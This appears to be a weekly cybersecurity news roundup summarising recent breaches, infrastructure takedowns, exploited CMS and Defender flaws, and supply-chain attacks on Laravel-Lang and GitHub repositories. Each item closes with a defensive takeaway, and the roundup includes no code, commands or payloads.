🏢 Major Breaches & Incidents - 7-Eleven breach update, Lithuania national register leak, bulletproof hosting arrests, First VPN disruption

🚨 Emerging Threats & Vulnerabilities - Drupal active exploitation, KnowledgeDeliver LMS web shells, Ghost CMS ClickFix campaign, Microsoft Defender zero-days, Laravel-Lang package poisoning, Megalodon GitHub supply-chain attack

🤖 AI in Cyber - CERT-In 12-hour patch guidance, Anthropic Mythos vulnerability findings

🔐 Privacy Watch - Radiology Associates of Richmond breach

🛒 7-Eleven Breach Exposes Personal Information of More Than 183,000 People
The 7-Eleven breach story now has a sharper impact number: data for more than 183,000 people was added to Have I Been Pwned. ShinyHunters had previously claimed it stole more than 600,000 Salesforce records, while the company confirmed unauthorized access to systems storing franchisee documents. The update turns a vague extortion claim into a clearer data-exposure issue for impacted individuals.
👉️ Key takeaway: SaaS breach claims need fast validation, user notification, and credential monitoring because the public leak clock rarely waits for legal review.

🗂️ Lithuania Investigates Leak of 600,000-Plus National Register Entries
Lithuanian authorities are investigating a major leak involving more than 600,000 national register entries, including real estate and legal entity records. Prosecutors suspect foreign involvement, and the head of the State Enterprise Centre of Registers resigned after the incident. National register data may sound bureaucratic, but attackers love boring official records because they are useful, structured, and hard to change.
👉️ Key takeaway: Government registries need strong access controls, monitoring, and breach response plans because “public-sector database” is not the same as “low-value target.”

🏴‍☠️ Dutch Authorities Arrest Admins of Bulletproof Hosting Used by Russian Hackers
Dutch authorities arrested two people tied to companies allegedly providing bulletproof hosting to Russia-aligned threat actors. SecurityWeek reports the infrastructure was allegedly used by groups such as NoName057(16) for DDoS and other attacks against European targets. This is the kind of law-enforcement action that does not just clean up one victim environment. It hits the plumbing attackers rent when they want abuse complaints to go directly into the trash.
👉️ Key takeaway: Disrupting criminal infrastructure matters because takedowns can raise attacker costs, interrupt campaigns, and expose the service providers behind the curtain.

🕳️ First VPN Cybercrime Service Disrupted and Administrator Arrested
Authorities disrupted First VPN, a cybercrime service the FBI says was used by dozens of ransomware groups for reconnaissance and intrusions. The administrator was arrested, and the action targeted infrastructure used to anonymize and support malicious activity. Victim-side cleanup is necessary, but ecosystem takedowns hit the services attackers rely on to scale operations quietly.
👉️ Key takeaway: Watch for follow-on attacker migration after infrastructure takedowns, because disruption helps, but cybercrime crews tend to look for a new hiding place fast.

🧱 CISA Orders Agencies to Patch Actively Exploited Drupal Flaw
CISA added CVE-2026-9082 to its Known Exploited Vulnerabilities catalog after Drupal warned the flaw was being exploited in attacks. The vulnerability can be abused without authentication and may lead to information disclosure, privilege escalation, or remote code execution, which is basically the CMS vulnerability tasting menu nobody ordered. Federal agencies have a short patch deadline, but any organization running public-facing Drupal should not wait for attackers to send a calendar invite.
👉️ Key takeaway: Patch Drupal immediately, confirm exposure across public sites, and check for post-exploitation activity before calling the update done.

🎓 KnowledgeDeliver LMS Zero-Day Used to Drop Web Shells
Attackers exploited a KnowledgeDeliver LMS zero-day tied to hardcoded machineKey values, enabling ViewState deserialization and remote code execution. SecurityWeek reports the flaw was used to deploy web shells, giving attackers a persistent foothold inside affected systems. Education and training platforms often sit in trusted environments, which makes “just an LMS” a very optimistic phrase.
👉️ Key takeaway: Patch or isolate KnowledgeDeliver systems, hunt for web shells, and review machineKey exposure before attackers turn training portals into beachheads.

👻 Ghost CMS Flaw Fuels Large-Scale ClickFix Campaign
Attackers are exploiting CVE-2026-26980 in Ghost CMS to inject malicious JavaScript into vulnerable sites. The injected code pushes visitors into ClickFix-style attack flows, where users are tricked into running commands or completing fake verification steps that install malware. SecurityWeek separately reported hundreds of hacked websites, which means this is not a boutique problem. It is a public-web trust problem with a social-engineering wrapper.
👉️ Key takeaway: Patch Ghost CMS, scan sites for injected JavaScript, and treat sudden “verification” prompts as a sign your website may be helping attackers do tech support theater.

🛡️ Microsoft Patches Defender Zero-Days Exploited in Attacks
Microsoft began rolling out fixes for two Defender vulnerabilities exploited as zero-days. Because Defender is built into enterprise Windows defense workflows, flaws in the malware protection engine carry extra weight: the security tool is everywhere, trusted, and usually allowed to touch sensitive parts of the system. Microsoft’s automatic update path helps, but teams should still verify engine versions instead of assuming “it probably handled itself.”
👉️ Key takeaway: Confirm Defender updates deployed successfully, monitor for exploitation indicators, and remember that security tooling still needs security maintenance.

🧪 Laravel-Lang Packages Poisoned Across Hundreds of Historical Versions
Attackers rewrote Git tags across four Laravel-Lang packages, poisoning more than 700 historical versions with backdoors. That matters because developers often trust version history, tags, and package metadata as if attackers politely avoid the archives. Applications that installed or updated the compromised localization packages may have pulled malicious code through a supply-chain path that looked routine.
👉️ Key takeaway: Audit Laravel-Lang dependencies, verify package integrity, rotate exposed secrets, and do not assume older tagged versions are automatically safe.

🦈 Megalodon Supply-Chain Attack Hits 5,500-Plus GitHub Repositories
Researchers say the Megalodon campaign injected GitHub Actions workflows into more than 5,500 repositories. The workflows were designed to steal credentials, CI secrets, keys, and tokens, turning automation into the attacker’s favorite vending machine. This is separate from last week’s Shai-Hulud drama, which is bad news for anyone hoping developer supply-chain attacks were taking a long weekend.
👉️ Key takeaway: Review GitHub Actions changes, rotate CI secrets, restrict workflow permissions, and alert on unexpected workflow creation across repositories.

🏥 Radiology Associates of Richmond Breach Affects 266,000 People
Radiology Associates of Richmond disclosed that attackers stole files containing names and protected health information from its systems. The breach affects roughly 266,000 people, making it a solid reminder that healthcare data remains one of the most reliable targets on the internet. Medical records are valuable because they combine identity, billing, treatment, and insurance context in one tidy package criminals do not have to assemble themselves.
👉️ Key takeaway: Healthcare organizations need stronger segmentation, faster breach detection, and tighter third-party controls because protected health information keeps showing up in the blast radius.

⏱️ CERT-In Calls for 12-Hour Patching of Critical Internet-Facing Flaws
India’s CERT-In issued guidance calling for critical internet-facing vulnerabilities to be patched within 12 hours where feasible. The agency cited AI-assisted vulnerability discovery and exploitation speed as part of the urgency, which is a polite way of saying attackers are not waiting for your next change advisory board meeting. This is a major signal that patch governance is being pulled toward much shorter response windows.
👉️ Key takeaway: Organizations need real-time asset inventory, emergency patch workflows, and rollback plans before 12-hour patching becomes the new executive expectation.

🧠 Anthropic Mythos Finds 23,000 Potential Vulnerabilities Across Open Source Projects
Anthropic says its Mythos Preview system identified more than 23,000 potential vulnerabilities across more than 1,000 open-source projects. So far, 1,726 have reportedly been confirmed, with more than 1,000 rated high or critical. The headline number is flashy, but the real operational problem is triage: finding bugs at scale is useful only if maintainers and defenders can validate, prioritize, and fix them before the backlog becomes a landfill.
👉️ Key takeaway: AI-driven vulnerability discovery is becoming real, but remediation capacity, maintainer bandwidth, and disclosure workflows are now the bottleneck.